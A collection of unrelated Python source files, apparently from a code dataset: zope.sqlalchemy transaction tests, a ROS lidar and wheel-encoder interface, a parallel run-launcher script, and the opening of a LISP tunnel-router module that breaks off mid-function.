def asDict(self):
return dict((k, v) for k, v in self.__dict__.items() if not k.startswith('_'))
class User(SimpleModel):
pass
class Skill(SimpleModel):
pass
engine = sa.create_engine(TEST_DSN)
engine2 = sa.create_engine(TEST_DSN)
# See https://code.google.com/p/pysqlite-static-env/
HAS_PATCHED_PYSQLITE = False
if engine.url.drivername == 'sqlite':
try:
from pysqlite2.dbapi2 import Connection
except ImportError:
pass
else:
if hasattr(Connection, 'operation_needs_transaction_callback'):
HAS_PATCHED_PYSQLITE = True
if HAS_PATCHED_PYSQLITE:
from sqlalchemy import event
from zope.sqlalchemy.datamanager import NO_SAVEPOINT_SUPPORT
NO_SAVEPOINT_SUPPORT.remove('sqlite')
@event.listens_for(engine, 'connect')
def connect(dbapi_connection, connection_record):
dbapi_connection.operation_needs_transaction_callback = lambda x: True
Session = orm.scoped_session(orm.sessionmaker(
bind=engine,
extension=tx.ZopeTransactionExtension(),
twophase=TEST_TWOPHASE,
))
UnboundSession = orm.scoped_session(orm.sessionmaker(
extension=tx.ZopeTransactionExtension(),
twophase=TEST_TWOPHASE,
))
EventSession = orm.scoped_session(orm.sessionmaker(
bind=engine,
twophase=TEST_TWOPHASE,
))
KeepSession = orm.scoped_session(orm.sessionmaker(
bind=engine,
extension=tx.ZopeTransactionExtension(keep_session=True),
twophase=TEST_TWOPHASE,
))
tx.register(EventSession)
metadata = sa.MetaData() # best to use unbound metadata
test_users = sa.Table(
'test_users',
metadata,
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('firstname', sa.VARCHAR(255)), # mssql cannot do equality on a text type
sa.Column('lastname', sa.VARCHAR(255)),
)
test_skills = sa.Table(
'test_skills',
metadata,
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('user_id', sa.Integer),
sa.Column('name', sa.VARCHAR(255)),
sa.ForeignKeyConstraint(('user_id',), ('test_users.id',)),
)
bound_metadata1 = sa.MetaData(engine)
bound_metadata2 = sa.MetaData(engine2)
test_one = sa.Table('test_one', bound_metadata1, sa.Column('id', sa.Integer, primary_key=True))
test_two = sa.Table('test_two', bound_metadata2, sa.Column('id', sa.Integer, primary_key=True))
class TestOne(SimpleModel):
pass
class TestTwo(SimpleModel):
pass
def setup_mappers():
orm.clear_mappers()
# Other tests can clear mappers by calling clear_mappers(),
# be more robust by setting up mappers in the test setup.
m1 = orm.mapper(
User,
test_users,
properties={'skills': orm.relation(
Skill,
primaryjoin=test_users.columns['id'] == test_skills.columns['user_id']),
})
m2 = orm.mapper(Skill, test_skills)
m3 = orm.mapper(TestOne, test_one)
m4 = orm.mapper(TestTwo, test_two)
return [m1, m2, m3, m4]
class DummyException(Exception):
pass
class DummyTargetRaised(DummyException):
pass
class DummyTargetResult(DummyException):
pass
class DummyDataManager(object):
def __init__(self, key, target=None, args=(), kwargs={}):
self.key = key
self.target = target
self.args = args
self.kwargs = kwargs
def abort(self, trans):
pass
def tpc_begin(self, trans):
pass
def commit(self, trans):
pass
def tpc_vote(self, trans):
if self.target is not None:
try:
result = self.target(*self.args, **self.kwargs)
except Exception as e:
raise DummyTargetRaised(e)
raise DummyTargetResult(result)
else:
raise DummyException('DummyDataManager cannot commit')
def tpc_finish(self, trans):
pass
def tpc_abort(self, trans):
pass
def sortKey(self):
return self.key
class ZopeSQLAlchemyTests(unittest.TestCase):
def setUp(self):
self.mappers = setup_mappers()
metadata.drop_all(engine)
metadata.create_all(engine)
def tearDown(self):
transaction.abort()
metadata.drop_all(engine)
orm.clear_mappers()
def testMarkUnknownSession(self):
import zope.sqlalchemy.datamanager
dummy = DummyDataManager(key='dummy.first')
session = Session()
mark_changed(session)
self.assertTrue(id(session) in zope.sqlalchemy.datamanager._SESSION_STATE)
def testAbortBeforeCommit(self):
# Simulate what happens in a conflict error
dummy = DummyDataManager(key='dummy.first')
session = Session()
conn = session.connection()
mark_changed(session)
try:
# Thus we could fail in commit
transaction.commit()
except:
# But abort must succed (and actually rollback the base connection)
transaction.abort()
pass
# Or the next transaction the next transaction will not be able to start!
transaction.begin()
session = Session()
conn = session.connection()
conn.execute("SELECT 1 FROM test_users")
mark_changed(session)
transaction.commit()
def testAbortAfterCommit(self):
# This is a regression test which used to wedge the transaction
# machinery when using PostgreSQL (and perhaps other) connections.
# Basically, if a commit failed, there was no way to abort the
# transaction. Leaving the transaction wedged.
transaction.begin()
session = Session()
conn = session.connection()
# At least PostgresSQL requires a rollback after invalid SQL is executed
self.assertRaises(Exception, conn.execute, "BAD SQL SYNTAX")
mark_changed(session)
try:
# Thus we could fail in commit
transaction.commit()
except:
# But abort must succed (and actually rollback the base connection)
transaction.abort()
pass
# Or the next transaction the next transaction will not be able to start!
transaction.begin()
session = Session()
conn = session.connection()
conn.execute("SELECT 1 FROM test_users")
mark_changed(session)
transaction.commit()
def testSimplePopulation(self):
session = Session()
query = session.query(User)
rows = query.all()
self.assertEqual(len(rows), 0)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
# bypass the session machinary
stmt = sql.select(test_users.columns).order_by('id')
conn = session.connection()
results = conn.execute(stmt)
self.assertEqual(results.fetchall(), [(1, 'udo', 'juergens'), (2, 'heino', 'n/a')])
def testRelations(self):
session = Session()
session.add(User(id=1, firstname='foo', lastname='bar'))
user = session.query(User).filter_by(firstname='foo')[0]
user.skills.append(Skill(id=1, name='Zope'))
session.flush()
def testTransactionJoining(self):
transaction.abort() # clean slate
t = transaction.get()
self.assertFalse(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Joined transaction too early")
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
t = transaction.get()
# Expect this to fail with SQLAlchemy 0.4
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
transaction.abort()
conn = Session().connection()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
def testTransactionJoiningUsingRegister(self):
transaction.abort() # clean slate
t = transaction.get()
self.assertFalse(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Joined transaction too early")
session = EventSession()
session.add(User(id=1, firstname='udo', lastname='juergens'))
t = transaction.get()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
transaction.abort()
conn = EventSession().connection()
self.assertTrue(
[r for r in t._resources if isinstance(r, tx.SessionDataManager)],
"Not joined transaction")
def testSavepoint(self):
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
t = transaction.get()
session = Session()
query = session.query(User)
self.assertFalse(query.all(), "Users table should be empty")
s0 = t.savepoint(optimistic=True) # this should always work
if not use_savepoint:
self.assertRaises(TypeError, t.savepoint)
return # sqlite databases do not support savepoints
s1 = t.savepoint()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.flush()
self.assertTrue(len(query.all()) == 1, "Users table should have one row")
s2 = t.savepoint()
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
self.assertTrue(len(query.all()) == 2, "Users table should have two rows")
s2.rollback()
self.assertTrue(len(query.all()) == 1, "Users table should have one row")
s1.rollback()
self.assertFalse(query.all(), "Users table should be empty")
def testRollbackAttributes(self):
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
if not use_savepoint:
return # sqlite databases do not support savepoints
t = transaction.get()
session = Session()
query = session.query(User)
self.assertFalse(query.all(), "Users table should be empty")
s1 = t.savepoint()
user = User(id=1, firstname='udo', lastname='juergens')
session.add(user)
session.flush()
s2 = t.savepoint()
user.firstname = 'heino'
session.flush()
s2.rollback()
self.assertEqual(user.firstname, 'udo', "User firstname attribute should have been rolled back")
def testCommit(self):
session = Session()
use_savepoint = not engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT
query = session.query(User)
rows = query.all()
self.assertEqual(len(rows), 0)
transaction.commit() # test a none modifying transaction works
session = Session()
query = session.query(User)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
transaction.abort() # test that the abort really aborts
session = Session()
query = session.query(User)
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 0)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
transaction.commit()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
# bypass the session (and transaction) machinary
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 2)
def testCommitWithSavepoint(self):
if engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT:
return
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
transaction.commit()
session = Session()
query = session.query(User)
# lets just test that savepoints don't affect commits
t = transaction.get()
rows = query.order_by(User.id).all()
s1 = t.savepoint()
session.delete(rows[1])
session.flush()
transaction.commit()
# bypass the session machinary
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 1)
def testNestedSessionCommitAllowed(self):
# Existing code might use nested transactions
if engine.url.drivername in tx.NO_SAVEPOINT_SUPPORT:
return
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.begin_nested()
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.commit()
transaction.commit()
def testSessionCommitDisallowed(self):
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
self.assertRaises(AssertionError, session.commit)
def testTwoPhase(self):
session = Session()
if not session.twophase:
return
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
transaction.commit()
# Test that we clean up after a tpc_abort
t = transaction.get()
def target():
return engine.connect().recover_twophase()
dummy = DummyDataManager(key='~~~dummy.last', target=target)
t.join(dummy)
session = Session()
query = session.query(User)
rows = query.all()
session.delete(rows[0])
session.flush()
result = None
try:
t.commit()
except DummyTargetResult as e:
result = e.args[0]
except DummyTargetRaised as e:
raise e.args[0]
self.assertEqual(len(result), 1, "Should have been one prepared transaction when dummy aborted")
transaction.begin()
self.assertEqual(len(engine.connect().recover_twophase()), 0, "Test no outstanding prepared transactions")
def testThread(self):
transaction.abort()
global thread_error
thread_error = None
def target():
try:
session = Session()
metadata.drop_all(engine)
metadata.create_all(engine)
query = session.query(User)
rows = query.all()
self.assertEqual(len(rows), 0)
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
session.flush()
rows = query.order_by(User.id).all()
self.assertEqual(len(rows), 2)
row1 = rows[0]
d = row1.asDict()
self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})
except Exception as err:
global thread_error
thread_error = err
transaction.abort()
thread = threading.Thread(target=target)
thread.start()
thread.join()
if thread_error is not None:
raise thread_error # reraise in current thread
def testBulkDelete(self):
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
transaction.commit()
session = Session()
session.query(User).delete()
transaction.commit()
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 0)
def testBulkUpdate(self):
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
transaction.commit()
session = Session()
session.query(User).update(dict(lastname="smith"))
transaction.commit()
results = engine.connect().execute(test_users.select(test_users.c.lastname == "smith"))
self.assertEqual(len(results.fetchall()), 2)
def testBulkDeleteUsingRegister(self):
session = EventSession()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
transaction.commit()
session = EventSession()
session.query(User).delete()
transaction.commit()
results = engine.connect().execute(test_users.select())
self.assertEqual(len(results.fetchall()), 0)
def testBulkUpdateUsingRegister(self):
session = EventSession()
session.add(User(id=1, firstname='udo', lastname='juergens'))
session.add(User(id=2, firstname='heino', lastname='n/a'))
transaction.commit()
session = EventSession()
session.query(User).update(dict(lastname="smith"))
transaction.commit()
results = engine.connect().execute(test_users.select(test_users.c.lastname == "smith"))
self.assertEqual(len(results.fetchall()), 2)
def testFailedJoin(self):
# When a join is issued while the transaction is in COMMITFAILED, the
# session is never closed and the session id stays in _SESSION_STATE,
# which means the session won't be joined in the future either. This
# causes the session to stay open forever, potentially accumulating
# data, but never issuing a commit.
dummy = DummyDataManager(key='dummy.first')
transaction.get().join(dummy)
try:
transaction.commit()
except DummyException:
# Commit raised an error, we are now in COMMITFAILED
pass
self.assertEqual(transaction.get().status, ZopeStatus.COMMITFAILED)
session = Session()
# try to interact with the session while the transaction is still
# in COMMITFAILED
self.assertRaises(TransactionFailedError,
session.query(User).all)
transaction.abort()
# start a new transaction everything should be ok now
transaction.begin()
session = Session()
self.assertEqual([], session.query(User).all())
session.add(User(id=1, firstname='udo', lastname='juergens'))
# abort transaction, session should be closed without commit
transaction.abort()
self.assertEqual([], session.query(User).all())
def testKeepSession(self):
session = KeepSession()
try:
with transaction.manager:
session.add(User(id=1, firstname='foo', lastname='bar'))
user = session.query(User).get(1)
# if the keep_session works correctly, this transaction will not close
# the session after commit
with transaction.manager:
user.firstname = 'super'
session.flush()
# make sure the session is still attached to user
self.assertEqual(user.firstname, 'super')
finally:
# KeepSession does not rollback on transaction abort
session.rollback()
def testExpireAll(self):
session = Session()
session.add(User(id=1, firstname='udo', lastname='juergens'))
transaction.commit()
session = Session()
instance = session.query(User).get(1)
transaction.commit() # No work, session.close()
self.assertEqual(sa.inspect(instance).expired, True)
class RetryTests(unittest.TestCase):
def setUp(self):
self.mappers = setup_mappers()
metadata.drop_all(engine)
metadata.create_all(engine)
self.tm1 = transaction.TransactionManager()
self.tm2 = transaction.TransactionManager()
# With psycopg2 you might supply isolation_level='SERIALIZABLE' here,
# unfortunately that is not supported by cx_Oracle.
e1 = sa.create_engine(TEST_DSN)
e2 = sa.create_engine(TEST_DSN)
self.s1 = orm.sessionmaker(
bind=e1,
extension=tx.ZopeTransactionExtension(transaction_manager=self.tm1),
twophase=TEST_TWOPHASE,
)()
self.s2 = orm.sessionmaker(
bind=e2,
extension=tx.ZopeTransactionExtension(transaction_manager=self.tm2),
twophase=TEST_TWOPHASE,
)()
self.tm1.begin()
self.s1.add(User(id=1, firstname='udo', lastname='juergens'))
self.tm1.commit()
def tearDown(self):
self.tm1.abort()
self.tm2.abort()
metadata.drop_all(engine)
orm.clear_mappers()
def testRetry(self):
# sqlite is unable to run this test as the databse is locked
tm1, tm2, s1, s2 = self.tm1, self.tm2, self.s1, self.s2
# make sure we actually start a session.
tm1.begin()
self.assertTrue(len(s1.query(User).all()) == 1, "Users table should have one row")
tm2.begin()
self.assertTrue(len(s2.query(User).all()) == 1, "Users table should have one row")
s1.query(User).delete()
user = s2.query(User).get(1)
user.lastname = u('smith')
tm1.commit()
raised = False
try:
s2.flush()
except orm.exc.ConcurrentModificationError as e:
# This error is thrown when the number of updated rows is not as expected
raised = True
self.assertTrue(tm2._retryable(type(e), e), "Error should be retryable")
self.assertTrue(raised, "Did not raise expected error")
def testRetryThread(self):
tm1, tm2, s1, s2 = self.tm1, self.tm2, self.s1, self.s2
# make sure we actually start a session.
tm1.begin()
self.assertTrue(len(s1.query(User).all()) == 1, "Users table should have one row")
tm2.begin()
s2.connection().execute("SET TRANSACTION ISOLATION LEVEL SERIALIZABLE")
self.assertTrue(len(s2.query(User).all()) == 1, "Users table should have one row")
s1.query(User).delete()
raised = False
def target():
time.sleep(0.2)
tm1.commit()
thread = threading.Thread(target=target)
thread.start()
try:
user = s2.query(User).with_lockmode('update').get(1)
except exc.DBAPIError as e:
# This error wraps the underlying DBAPI module error, some of which are retryable
raised = True
retryable = tm2._retryable(type(e), e)
self.assertTrue(retryable, "Error should be retryable")
self.assertTrue(raised, "Did not raise expected error")
thread.join() # well, we must have joined by now
class MultipleEngineTests(unittest.TestCase):
def setUp(self):
self.mappers = setup_mappers()
bound_metadata1.drop_all()
bound_metadata1.create_all()
bound_metadata2.drop_all()
bound_metadata2.create_all()
def tearDown(self):
transaction.abort()
bound_metadata1.drop_all()
bound_metadata2.drop_all()
orm.clear_mappers()
def testTwoEngines(self):
session = UnboundSession()
session.add(TestOne(id=1))
session.add(TestTwo(id=2))
session.flush()
transaction.commit()
session = UnboundSession()
rows = session.query(TestOne).all()
self.assertEqual(len(rows), 1)
rows = session.query(TestTwo).all()
self.assertEqual(len(rows), 1)
def tearDownReadMe(test):
Base = test.globs['Base']
engine = test.globs['engine']
Base.metadata.drop_all(engine)
def test_suite():
from unittest import TestSuite, makeSuite
import doctest
optionflags = doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS
checker = RENormalizing([
# Python 3 includes module name in exceptions
(re.compile(r"sqlalchemy.orm.exc.DetachedInstanceError:"),
"DetachedInstanceError:"),
# Python 3 drops the u'' prefix on unicode strings
(re.compile(r"u('[^']*')"), r"\1"),
# PyPy includes __builtin__ in front of classes defined in doctests
(re.compile(r"__builtin__[.]Address"), "Address"),
])
suite = TestSuite()
suite.addTest(makeSuite(ZopeSQLAlchemyTests))
suite.addTest(makeSuite(MultipleEngineTests))
if TEST_DSN.startswith('postgres') or TEST_DSN.startswith('oracle'):
suite.addTest(makeSuite(RetryTests))
suite.addTest(doctest.DocFileSuite('README.txt', optionflags=optionflags,
checker=checker, tearDown=tearDownReadMe,
globs={'TEST_DSN': TEST_DSN, 'TEST_TWOPHASE': TEST_TWOPHASE}))
return suite
|
sensors.py | #!/usr/bin/env python
"""
Sensor module that contains ROS interface objects for various sensors.
Currently supporting: Lidars, Wheel Encoders
"""
from threading import Thread
import math
import rospy
from sensor_msgs.msg import LaserScan
from svea_msgs.msg import lli_encoder
from geometry_msgs.msg import TwistWithCovarianceStamped
__author__ = "Frank Jiang and Tobias Bolin"
__copyright__ = "Copyright 2020, Frank Jiang"
__credits__ = ["Frank Jiang", "Tobias Bolin"]
__license__ = "MIT"
__maintainer__ = "Frank Jiang"
__email__ = "frankji@kth.se"
__status__ = "Development"
class Lidar():
"""
Basic interface for handling a Lidar. Collects and stores the most recent
scan.
"""
def __init__(self):
self.scan = []
# list of functions to call whenever a new scan comes in
self.callbacks = []
def start(self):
"""
Spins up ROS background thread; must be called to start
receiving and sending data
:return: itself
:rtype: Lidar
"""
Thread(target=self._init_and_spin_ros, args=()).start()
return self
def _init_and_spin_ros(self):
rospy.loginfo("Starting Lidar Interface Node: \n" + str(self))
self._collect_srvs()
self._start_listen()
def _collect_srvs(self):
pass
def _start_listen(self):
rospy.Subscriber('scan', LaserScan, self._read_scan,
tcp_nodelay=True)
rospy.loginfo("Lidar Interface successfully initialized")
rospy.spin()
def _read_scan(self, scan_msg):
self.scan = scan_msg.ranges
self.angle_min = scan_msg.angle_min
self.angle_max = scan_msg.angle_max
self.angle_increment = scan_msg.angle_increment
self.time_increment = scan_msg.time_increment
self.last_scan_time = scan_msg.scan_time
for cb in self.callbacks:
cb(self.scan, self.angle_min, self.angle_increment)
def add_callback(self, cb):
"""Add state callback. Every function passed into this method
will be called whenever new scan information comes in from the
Lidar driver.
:param cb: A callback function intended for responding to the
reception of a new scan, function must accept list
of scans, min angle, and angle increment as arguments
:type cb: function
"""
self.callbacks.append(cb)
def remove_callback(self, cb):
"""Remove callback so it will no longer be called when state
information is received
:param cb: A callback function that should be no longer used
in response to the reception of state info
:type cb: function
"""
while cb in self.callbacks:
self.callbacks.pop(self.callbacks.index(cb))
class WheelEncoder():
"""Interface for wheel encoders
:param vehicle_name: name of the vehicle, defaults to ''
:type vehicle_name: str, optional
:param encoder_frame: Transform frame id of the encoders,
defaults to 'base_link'
:type encoder_frame: str, optional
:param encoder_topic: Topic that encoder messages should be read from,
defaults to 'lli/encoder'
:type encoder_topic: str, optional
:param direction_topic: Topic with twist messages
used for calculating the direction, defaults to ''
:type direction_topic: str, optional
:param axle_track: Whidth between the wheels in mm,
defaults to 199.0
:type axle_track: float, optional
:param wheel_radius: Radius of the wheels in mm,
defaults to 60.0
:type wheel_radius: float, optional
:param ticks_per_revolution: Number of encoder ticks in one revolution of a wheel,
defaults to 60
:type ticks_per_revolution: int, optional
:param linear_covariance: Covariance of the linear velocity in the published twist messages,
defaults to 0.2
:type linear_covariance: float, optional
:param angular_covariance: Covariance of the angular velocity
in the published twist messages, defaults to 0.4
:type angular_covariance: float, optional
"""
def __init__(self,
vehicle_name='',
encoder_frame='base_link',
encoder_topic='lli/encoder',
direction_topic='',
axle_track=199.0,
wheel_radius=60.0,
ticks_per_revolution=60,
linear_covariance=0.2,
angular_covariance=0.4,
):
if vehicle_name:
self.vehicle_name = vehicle_name
else:
namespace = rospy.get_namespace()
self.vehicle_name = namespace.split('/')[-1]
self.linear_covariance = linear_covariance
self.angular_covariance = angular_covariance
self.encoder_topic = encoder_topic
self.direction_topic = direction_topic
self.frame_id = encoder_frame
# Vehicle parameters
mm_to_meter = 1e-3
tau = 2 * math.pi
self.axle_track = axle_track * mm_to_meter
self.wheel_radius = wheel_radius
self.ticks_per_revolution = ticks_per_revolution
self.tick_to_distance_coefficient = (
wheel_radius * tau * mm_to_meter / ticks_per_revolution
)
# Storage fields
self.direction = 1
self.linear_velocity = 0.0
self.angular_velocity = 0.0
self.r_wheel_velocity = 0.0
self.l_wheel_velocity = 0.0
# list of functions to call whenever a new reading comes in
self.callbacks = []
def start(self):
"""
Spins up ROS background thread; must be called to start
receiving and sending data
:return: itself
:rtype: WheelEncoderInterface
"""
Thread(target=self._init_and_spin_ros, args=()).start()
return self
def _init_and_spin_ros(self):
rospy.loginfo('Starting wheel encoder Interface for'
+ self.vehicle_name)
self._collect_srvs()
self._start_listen()
rospy.loginfo('Succesfully initiated wheel encoder Interface for'
+ self.vehicle_name)
def _collect_srvs(self):
pass
def _start_listen(self):
self.encoder_subscriber = rospy.Subscriber(
self.encoder_topic,
lli_encoder,
self._process_encoder_data,
tcp_nodelay=True)
if self.direction_topic:
self.actuation_subscriber = rospy.Subscriber(
self.direction_topic,
TwistWithCovarianceStamped,
self._process_direction,
tcp_nodelay=True)
def _process_encoder_data(self, msg):
right_wheel_velocity = self._calc_wheel_velocity(
msg.right_ticks,
msg.right_time_delta)
left_wheel_velocity = self._calc_wheel_velocity(
msg.left_ticks,
msg.left_time_delta)
direction = self.direction
# Linear velocity
self.linear_velocity = (right_wheel_velocity + left_wheel_velocity)/2
self.linear_velocity *= direction
# Angular velocity
angular_velocity = (right_wheel_velocity - left_wheel_velocity)
angular_velocity /= self.axle_track
angular_velocity *= direction
self.angular_velocity = angular_velocity
for cb in self.callbacks:
cb(self)
def _process_direction(self, msg):
velocity = msg.twist.twist.linear.x
direction_epsilon = self.tick_to_distance_coefficient * 0.5 # m/s
if velocity > direction_epsilon:
self.direction = 1
elif velocity < direction_epsilon:
self.direction = -1
else:
self.directions = 0
def _calc_wheel_velocity(self, ticks, time_delta):
if time_delta == 0:
return 0
distance = ticks * self.tick_to_distance_coefficient
velocity = (distance/time_delta) * 1e6
return velocity
def add_callback(self, cb):
"""Add a callback. Every function passed into this method
will be called whenever new information comes in from the sensor.
:param cb: A callback function intended for responding to the
reception of a new reading.
The function should take a WheelEncoder object
as input.
:type cb: function
:return: Handle to the callback function
"""
self.callbacks.append(cb)
def remove_callback(self, cb):
"""Remove callback so it will no longer be called when state
information is received
:param cb: A callback function that should be no longer used
in response to the reception of state info
:type cb: function
"""
while cb in self.callbacks:
self.callbacks.pop(self.callbacks.index(cb))
|
launch_repeat_runs.py | #
# Copyright John Reid 2009
#
"""
Code to launch the site DPM framework several times concurrently.
"""
import os, subprocess, logging, sys, Queue, threading, time, random
def ensure_dir_exists(dir):
"Makes a directory if it does not already exist."
if not os.access(dir, os.X_OK):
logging.info('Making directory: %s', dir)
os.makedirs(dir)
def get_new_dir(template_dir, run_index):
return os.path.join(template_dir, '%04d' % run_index)
def make_link(src, dst):
if os.path.exists(dst):
os.unlink(dst)
os.symlink(src, dst)
def make_new_dir_from_template(template_dir, new_dir):
"Copies or links data from template directory into new directory."
# make sure directories exist
ensure_dir_exists(os.path.join(new_dir, 'cache'))
for ext in [
'hit-counts',
'ucsc-analysis',
]:
# link cache file
cached_filename = '%s.%s' % (tag, ext)
if os.path.exists(os.path.join(template_dir, 'cache', cached_filename)):
template_filename = os.path.join('..', '..', 'cache', cached_filename)
new_filename = os.path.join(new_dir, 'cache', cached_filename)
make_link(template_filename, new_filename)
# link options file if it exists
if os.path.exists(os.path.join(template_dir, 'options.py')):
make_link(os.path.join('..', 'options.py'), os.path.join(new_dir, 'options.py'))
def execute_cmd(args, cwd):
"Execute the command."
logging.info('Executing: %s in %s', args, cwd)
retcode = subprocess.call(args, cwd=cwd)
if 0 != retcode:
logging.error('Exit status: %d: %s', retcode, args)
def worker():
"Worker thread to execute tasks from the queue."
while True:
run_index = q.get()
logging.info('Run #: % 3d' % run_index)
new_dir = get_new_dir(template_dir, run_index)
make_new_dir_from_template(template_dir, new_dir)
args = [
'python',
'../../../tp_go_analysis.py',
tag
]
execute_cmd(args, new_dir)
args = [
'python',
'../../../validate.py',
tag
]
execute_cmd(args, new_dir)
q.task_done()
#
# Set up logging
#
logging.basicConfig(level=logging.DEBUG)
file_handler = logging.FileHandler('launch-repeat-runs.log')
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(message)s'))
logging.getLogger().addHandler(file_handler)
#
# Get positional arguments
#
try:
logging.info('Command line: %s', ' '.join(sys.argv))
script_name = sys.argv.pop(0)
template_dir = sys.argv.pop(0)
logging.info('Template directory: %s' % template_dir)
num_runs = int(sys.argv.pop(0))
logging.info('# runs: %d' % num_runs)
tag = sys.argv.pop(0)
logging.info('Tag: %s' % tag)
except:
logging.error('USAGE: python %s <template directory> <number of runs> <tag>', script_name)
raise
#
# Set up worker threads
#
num_worker_threads = 4
stagger = 3
logging.info('Using %d worker threads' % num_worker_threads)
logging.info('Initialising worker threads')
q = Queue.Queue()
for i in range(num_worker_threads):
t = threading.Thread(target=worker)
t.setDaemon(True)
t.start()
logging.info('Populating task queue')
for run_index in xrange(num_runs):
q.put(run_index)
time.sleep(1.)
#
# Wait until completed
#
logging.info('Blocking until all tasks completed')
q.join() # block until all tasks are done
logging.info('All tasks completed')
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
import lisp
import lispconfig
import socket
import select
import threading
import time
import os
from subprocess import getoutput
import struct
try:
import pcappy
except:
pass
#endtry
import pcapy
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_nat_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ephem_nat_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_itr_info_timer = None
#
# This is for testing sending from one local EID-prefix to another EID-prefix
# on the same system. Rather than natively forwarding a packet, the mapping
# system is used.
#
lisp_xtr_loopback = False
#
# Used to start pcap threads concurrently.
#
lisp_pcap_lock = threading.Lock()
#------------------------------------------------------------------------------
#
# lisp_itr_show_command
#
# Display state in an ITR.
#
def lisp_itr_show_command(parameter):
return(lispconfig.lisp_itr_rtr_show_command(parameter, "ITR", []))
#enddef
#
# lisp_itr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_itr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("ITR"))
#enddef
#
# lisp_itr_show_rloc_probe_command
#
# Display RLOC-probe list state in an ITR.
#
def lisp_itr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("ITR"))
#enddef
#
# lisp_itr_process_timer
#
# This is the ITR's 60-second periodic timer routine. We typically use it
# to time-out map-cache entries. But the one case where we are acting as
# a L2-overlay ITR, we will send Map-Requests to retrieve the broadcast
# entry so we have the latest replication-list before we need it.
#
def lisp_itr_process_timer(lisp_sockets, lisp_ephem_port):
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in list(lisp.lisp_crypto_keys_by_nonce.values()):
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce = {}
#
# If doing L2-overlays, get map-cache entry from (0000-0000-0000/0,
# ffff-ffff-ffff/48).
#
if (lisp.lisp_l2_overlay):
afi = lisp.LISP_AFI_MAC
iid = lisp.lisp_default_iid
s = lisp.lisp_address(afi, "0000-0000-0000", 0, iid)
s.mask_len = 0
